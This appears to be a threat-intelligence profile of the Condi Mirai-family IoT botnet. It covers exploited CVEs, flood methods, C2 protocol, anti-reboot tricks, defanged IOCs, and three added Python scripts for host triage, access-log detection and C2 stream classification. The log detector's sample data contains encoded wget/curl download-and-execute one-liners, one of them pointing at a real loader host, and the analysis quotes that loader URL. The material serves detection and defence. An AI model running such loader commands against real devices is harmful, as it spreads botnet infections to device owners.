Condi
Condi is a Mirai-based IoT botnet malware family, operated as a DDoS-as-a-service offering, that targets embedded Linux devices, especially routers and other IoT systems. It has been documented exploiting TP-Link Archer AX21 routers via CVE-2023-1389 and has also been delivered in campaigns exploiting GeoServer CVE-2024-36401. Reporting also links Condi-related Mirai-like payloads to attempted (and, per Unit 42, unsuccessful) exploitation of end-of-life TP-Link routers affected by CVE-2023-33538; the ARM binaries those attempts tried to download contained multiple references to the string "condi" and behaved as Condi variants.
Condi propagates by scanning public IPs for HTTP services on ports 80 and 8080 and sending a hardcoded exploit request that makes a vulnerable device download and execute a remote shell script. The script is a typical Mirai-style loader that tries to fetch and run a bot binary for each supported architecture in turn. FortiGuard observed Condi using a downloader script at cdn2[.]duc3k[.]com/t against CVE-2023-1389 targets, and source code for an older version shows additional propagation logic, including scanning for devices with an open Android Debug Bridge port (TCP/5555). In the GeoServer campaign, Condi was reported downloading multi-architecture bot binaries from hxxp://209[.]146[.]124[.]181:8030 and executing them from /tmp. Condi samples were also associated with repeated DNS queries to trcpay[.]xyz.
The malware exists to run DDoS attacks and supports several flooding methods. Reported attack capabilities include TCP SYN, TCP ACK and other TCP flood variants, a TCP STOMP-style flood, plain UDP flooding, threaded UDP flooding, UDP flooding with extra error handling, and VSE (Valve Source Engine) floods. Fortinet specifically noted TCP flooding, UDP flooding, and VSE DDoS functionality.
Condi talks to its C2 over a modified version of Mirai's binary command-and-control protocol. One analyzed sample registered with the bytes \x33\x66\x99, a sequence noted as commonly associated with Moobot. C2-controlled functions include heartbeat or bot-activity checks, termination, lockdown-related functionality, self-update, starting an embedded HTTP server, updating the binaries that server hands out, and reporting the webserver port. Some Condi-related samples update from hard-coded infrastructure, including 51.38.137[.]113 over TCP/80, and can retrieve binaries for multiple CPU architectures. Once told to start the webserver, the bot downloads the bot binaries and serves them from a basic HTTP server on a random port above 1024 so that other infected devices can fetch an architecture-specific copy; the server sometimes masquerades as Apache via a "Server: Apache" header.
Behaviorally, Condi includes aggressive process-killing and anti-competition logic. It reads /proc/<PID>/status, kills processes whose names match a built-in list, kills processes whose binary filenames contain architecture strings such as x86, x86_64, arm, arm5, arm6, arm7, mips, mipsel, sh4, and ppc (the naming convention other Mirai-family bots use for their own payloads), and applies further heuristics, including random-string and command-line-length checks, to terminate additional processes, including ones that might detect it. To hinder recovery and keep control of the device, Condi tries to prevent a reboot by deleting the reboot, shutdown, poweroff, and halt binaries from common Linux paths. Fortinet noted that the malware does not survive a normal reboot, which is exactly why it obstructs reboot commands; a router whose shell can no longer reboot it should be treated as a likely infection indicator and power-cycled instead.
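The two host-side artefacts described above (deleted reboot-family binaries and architecture-tagged drop files) are cheap to check for. The following triage script is an added example for this page, not Condi's code or any vendor's tool. It takes a root directory so it can be run against "/" on a suspect device or against an extracted filesystem image. The directory list (sbin, bin, usr/sbin, usr/bin) is an assumed reading of the page's "common Linux paths", and the use of /tmp follows the page's note that Condi executes from /tmp; both are assumptions to adapt to the device. Symlinks count as present because on busybox and systemd systems these commands are links, and the sample filesystem built in build_sample_root() is constructed for illustration.

```python
"""Host triage for Condi's anti-reboot and propagation artefacts (added example, not Condi's code)."""
import os
import re
import tempfile
from pathlib import Path

POWER_BINARIES = ("reboot", "shutdown", "poweroff", "halt")   # the set the page says Condi deletes
BIN_DIRS = ("sbin", "bin", "usr/sbin", "usr/bin")              # assumption: the page's "common Linux paths"

# Architecture tags from the page, anchored as a suffix after ., _ or - (or the whole name)
# so that e.g. "sshd" or "parmesan" do not match.
ARCH_TAG_RE = re.compile(r"(?:^|[._-])(x86_64|x86|arm[567]?|mipsel|mips|sh4|ppc)$", re.I)


def missing_power_binaries(root) -> list:
    """Names of reboot-family commands that exist in none of the candidate directories.

    os.path.lexists() is used so that a symlink (busybox or systemctl target) counts
    as present; only a command that is gone everywhere is reported.
    """
    root = Path(root)
    return [
        name for name in POWER_BINARIES
        if not any(os.path.lexists(root / d / name) for d in BIN_DIRS)
    ]


def arch_tagged_files(root, subdir="tmp") -> list:
    """Regular files under root/subdir whose names end in a bot-style architecture tag."""
    root = Path(root)
    base = root / subdir
    if not base.is_dir():
        return []
    return [
        str(p.relative_to(root))
        for p in sorted(base.rglob("*"))
        if p.is_file() and ARCH_TAG_RE.search(p.name)
    ]


def triage(root) -> dict:
    """Combine both checks into one finding dictionary."""
    return {
        "missing_power_binaries": missing_power_binaries(root),
        "arch_tagged_files": arch_tagged_files(root),
    }


def build_sample_root() -> str:
    """Constructed filesystem image: reboot and poweroff deleted, bot drops in /tmp."""
    root = Path(tempfile.mkdtemp(prefix="condi-triage-"))
    for d in BIN_DIRS + ("tmp",):
        (root / d).mkdir(parents=True, exist_ok=True)
    (root / "sbin" / "shutdown").write_bytes(b"#!/bin/sh\n")
    try:
        os.symlink("busybox", root / "sbin" / "halt")   # dangling link: still "present"
    except OSError:
        (root / "sbin" / "halt").write_bytes(b"#!/bin/sh\n")
    for name in ("x86", "bot.arm7", "mipsel", "notes.txt"):
        (root / "tmp" / name).write_bytes(b"\x7fELF")
    return str(root)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_root()
    for key, value in triage(target).items():
        print(f"{key}: {value or 'none'}")
```

An empty missing_power_binaries list on a real device means only that the commands are where the script looked; a non-empty list is worth a closer look even if the device uses an unusual layout. The architecture-tag check is a triage filter, not proof: legitimate firmware occasionally ships files with these names, so confirm with a hash or a look at the file header.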
Observed infrastructure and identifiers include cdn2[.]duc3k[.]com, admin[.]duc3k[.]com, 209[.]146[.]124[.]181:8030, trcpay[.]xyz, 51.38.137[.]113, and cnc.vietdediserver[.]shop. A FortiGuard-analyzed ARM sample had SHA-256 509f5bb6bcc0f2da762847364f7c433d1179fb2b2f4828eefb30828c485a3084. Fortinet detections cited in the reporting include Linux/Mirai.REAL!tr and Linux/Mirai.CDB!tr. Condi has been advertised through a Telegram channel named "Condi Network", and FortiGuard linked the malware to a Telegram contact shown on related infrastructure. Across sources, Condi is consistently characterized as an IoT-focused Mirai-family botnet used for large-scale DDoS activity and remote control of compromised devices.
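The propagation pattern described earlier (an exploit request that carries a "download, then run" one-liner pointing at loader infrastructure) leaves a recognizable trace in the access logs of anything listening on 80 or 8080. The detector below is an added example for this page, not Condi's code or any vendor's rule. It URL-decodes each request target and flags two things: a fetch tool (wget, curl, tftp, ftpget) followed later in the same request by an execution step (sh, bash or chmod), and any URL whose host is on this page's IOC list. The IOC hosts are refanged from the page; the log lines and the request paths in SAMPLE_LOG are constructed placeholders and do not reproduce any real exploit string.

```python
"""Flag Condi/Mirai-style loader attempts in web-server access logs (added example, not Condi's code)."""
import re
from urllib.parse import unquote

# Hosts from the page's IOC list, refanged (the page writes them as [.]).
CONDI_HOSTS = {
    "cdn2.duc3k.com",
    "admin.duc3k.com",
    "209.146.124.181",
    "trcpay.xyz",
    "51.38.137.113",
    "cnc.vietdediserver.shop",
}

# Combined log format: src ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# A fetch tool followed, anywhere later in the decoded request, by an execution step:
# the shape of the Mirai-style "download, then run" one-liner.
DOWNLOAD_EXEC_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b.*?(\bsh\b|\bbash\b|\bchmod\b)")
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")


def analyze_request(target: str) -> list:
    """Return the reasons a single request target looks like a loader attempt ([] if clean)."""
    decoded = unquote(unquote(target))  # decode twice: double-encoded payloads are common
    reasons = []
    if DOWNLOAD_EXEC_RE.search(decoded):
        reasons.append("download-and-execute chain")
    for host in URL_HOST_RE.findall(decoded):
        if host.lower() in CONDI_HOSTS:
            reasons.append(f"known Condi host: {host.lower()}")
    return reasons


def analyze_log(lines) -> list:
    """Parse access-log lines and return one finding dict per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than crash on a stray line
        reasons = analyze_request(m["target"])
        if reasons:
            findings.append({
                "src": m["src"],
                "ts": m["ts"],
                "target": m["target"],
                "status": m["status"],
                "reasons": reasons,
            })
    return findings


# Constructed sample; the cmd= and action= vectors are placeholders, not a real exploit path.
SAMPLE_LOG = [
    '10.0.0.2 - - [10/Jun/2023:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 1234',
    '203.0.113.5 - - [10/Jun/2023:12:00:01 +0000] "GET /cgi-bin/setup?cmd='
    '%24%28cd%20%2Ftmp%3Bwget%20http%3A%2F%2Fcdn2.duc3k.com%2Ft%20-O-%7Csh%29 HTTP/1.1" 200 512',
    '10.0.0.3 - - [10/Jun/2023:12:00:02 +0000] "GET /search?q=wget+manual HTTP/1.1" 200 99',
    '198.51.100.7 - - [10/Jun/2023:12:00:03 +0000] "POST /setup.cgi?action='
    '%60curl%20http%3A%2F%2F192.0.2.10%2Fbot.sh%7Cbash%60 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["ts"], f["src"], f["status"], "->", "; ".join(f["reasons"]))
```

Note that the third sample line mentions wget but has no execution step and is correctly ignored, while the fourth is flagged on the chain alone even though its host is not a known IOC: the chain signature catches new loader infrastructure, the host list catches the known one. A 404 or 200 status says nothing about success here, since the injection runs inside the device's handler regardless of what it returns, so triage every hit from an external source.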
Vulnerabilities exploited
3 CVEs correlated with this family across public research and vendor advisories.
FortiGuard Labs encountered recent samples of a DDoS-as-a-service botnet calling itself Condi. It attempted to spread by exploiting TP-Link Archer AX21 (AX1800) routers vulnerable to CVE-2023-1389... While the sample we analyzed only contained the scanner for CVE-2023-1389... in our case, of an infection via CVE-2023-1389, "0days".
The attacks, in this case, attempt to deploy a Mirai-like botnet malware, with the source code featuring numerous references to the string "Condi."
Unit 42 said it detected active, automated scans and probes attempting to exploit CVE-2023-33538 (CVSS score: 8.8), a command injection vulnerability impacting EoL TP-Link wireless routers, albeit using a flawed approach that doesn't result in a successful compromise.
The Broadside malware infects TBK DVR devices impacted by CVE-2024-3721, an OS command injection flaw that can be exploited remotely for arbitrary code execution.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (2 techniques)
Execution (3 techniques)
sends a hardcoded exploitation request... to download and execute a remote shell script at hxxp://cdn2[.]duc3k[.]com/t... The remote shell script is typical of Mirai-based loaders that try to download and execute binaries of each architecture in turn
Stealth (3 techniques)
Defense Impairment (1 technique)
Discovery (3 techniques)
it embeds a simple scanner modified from Mirai’s original Telnet scanner to scan for any public IPs with open ports 80 or 8080... We found source code for an older version of Condi that scans for devices with an open Android Debug Bridge port (TCP/5555)
Lateral Movement (2 techniques)
The arm7 binary also starts an HTTP server on the infected device using a port randomly chosen between 1024 and 65535. Once active, this server delivers fresh malware copies to other devices that connect to it, spreading the infection further without requiring any additional input from the attacker.
Command and Control (5 techniques)
The binary protocol used by Condi to communicate with the C2 server is a modified version of that initially implemented in Mirai.
Once it receives the command used to start the webserver, this malware downloads bot binaries... After that, it starts a basic HTTP server on a random port number above 1024 to host these binaries.
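To make "a modified version of Mirai's binary protocol" concrete for anyone looking at a captured bot-to-C2 conversation, here is a small stream classifier. It is an added example, not Condi's or Mirai's code. The baseline it parses is the original Mirai framing as published in the leaked source: the bot registers with \x00\x00\x00\x01 followed by a one-byte length and an identifier, the C2 sends a two-byte big-endian length before each message, a zero length is a keepalive that the bot answers by echoing \x00\x00, and a non-zero length prefixes an attack command. The \x33\x66\x99 prefix is the registration sequence the page reports for the analyzed Condi sample; the page does not document what Condi sends after it or how far its framing departs from Mirai's, so the classifier matches only the prefix for that case and treats the Mirai framing as an assumption to verify against a real sample. The two byte strings in SAMPLE_* are constructed.

```python
"""Classify a Mirai-family bot-to-C2 TCP stream (added example, not Condi's or Mirai's code)."""
import struct
from typing import Optional, Tuple

MIRAI_REGISTER = b"\x00\x00\x00\x01"   # original Mirai hello prefix (leaked source)
CONDI_REGISTER = b"\x33\x66\x99"       # prefix reported for the analyzed Condi sample (also seen with Moobot)


def classify_registration(bot_first_bytes: bytes) -> Optional[str]:
    """Name the registration flavour from the first bytes the bot sends, or None."""
    if bot_first_bytes.startswith(CONDI_REGISTER):
        return "condi/moobot-style"
    if bot_first_bytes.startswith(MIRAI_REGISTER):
        return "mirai-original"
    return None


def parse_mirai_hello(data: bytes) -> Tuple[Optional[str], bytes]:
    """Split an original-Mirai hello into (identifier, bytes after the hello).

    Layout: 4-byte prefix, 1-byte identifier length, identifier. A malformed or
    truncated hello yields (None, data) so the caller can still inspect the rest.
    """
    if not data.startswith(MIRAI_REGISTER) or len(data) < 5:
        return None, data
    id_len = data[4]
    if len(data) < 5 + id_len:
        return None, data
    ident = data[5:5 + id_len].decode("ascii", "replace")
    return ident, data[5 + id_len:]


def parse_c2_frames(c2_to_bot: bytes) -> list:
    """Split C2->bot bytes into ("keepalive", b""), ("command", body) and ("truncated", body)."""
    frames = []
    i = 0
    while i + 2 <= len(c2_to_bot):
        (length,) = struct.unpack("!H", c2_to_bot[i:i + 2])
        i += 2
        if length == 0:
            frames.append(("keepalive", b""))
            continue
        body = c2_to_bot[i:i + length]
        if len(body) < length:          # capture ended mid-command
            frames.append(("truncated", body))
            break
        frames.append(("command", body))
        i += length
    return frames


def summarize_stream(bot_to_c2: bytes, c2_to_bot: bytes) -> dict:
    """Summarize one reassembled conversation: both directions already separated."""
    family = classify_registration(bot_to_c2)
    ident, rest = None, bot_to_c2
    if family == "mirai-original":
        ident, rest = parse_mirai_hello(bot_to_c2)
    elif family == "condi/moobot-style":
        rest = bot_to_c2[len(CONDI_REGISTER):]   # assumption: what follows the prefix is undocumented
    frames = parse_c2_frames(c2_to_bot)
    return {
        "family": family,
        "identifier": ident,
        "keepalives_from_c2": sum(1 for kind, _ in frames if kind == "keepalive"),
        "keepalive_echoes_from_bot": rest.count(b"\x00\x00"),
        "commands": [body for kind, body in frames if kind == "command"],
    }


# Constructed conversation: Mirai-style hello with identifier "rtr1", two keepalive
# exchanges, then one 8-byte command whose body is left opaque here.
SAMPLE_BOT_TO_C2 = MIRAI_REGISTER + b"\x04rtr1" + b"\x00\x00" * 2
SAMPLE_C2_TO_BOT = b"\x00\x00" * 2 + struct.pack("!H", 8) + b"\x00\x00\x00\x02\x01\x02\x03\x04"

if __name__ == "__main__":
    print(summarize_stream(SAMPLE_BOT_TO_C2, SAMPLE_C2_TO_BOT))
    print(classify_registration(b"\x33\x66\x99\x00"))
```

Feed it the two directions of a reassembled TCP stream (for example, the payloads extracted from a pcap). A stream that opens with \x33\x66\x99 toward one of the hosts listed on this page, followed by the two-byte zero keepalives and echoes, is the pattern to write a network signature for; the command bodies themselves are not decoded here because the page does not document Condi's command format.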
Impact (3 techniques)
it also prevents infections from other botnets by attempting to terminate their processes... kills any processes with matching names... kills any processes with binary filenames containing the following extensions commonly used by other botnets
IOCs tracked for this family
29 indicators (IPs, domains, DNS infrastructure, file hashes, and other indicator types) attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
11 sources tracked across advisories, community write-ups, and news.
Condi is referenced as an IoT botnet whose malware is similar to the observed arm7 Mirai variant. The binary acts as a command-driven bot and distribution node, connecting to C2 infrastructure, executing commands, updating itself, and serving malware binaries to spread across devices.
A Mirai-like botnet malware referenced in source code strings. The malware can update itself and act as a web server to spread infection to other connected devices.
Mirai-based IoT botnet malware intended for deployment to end-of-life TP-Link routers through attempted exploitation of CVE-2023-33538. Once executed, it connects to a C2 server, sends heartbeats, supports self-updates, starts an HTTP server on the infected device, and helps propagate malware copies to additional devices.
An IoT botnet malware family referenced as closely matching the downloaded arm7 sample. The sample contains multiple 'condi' strings and exhibits Mirai-like botnet behavior including C2 command handling, self-update across multiple architectures, and HTTP-based propagation support.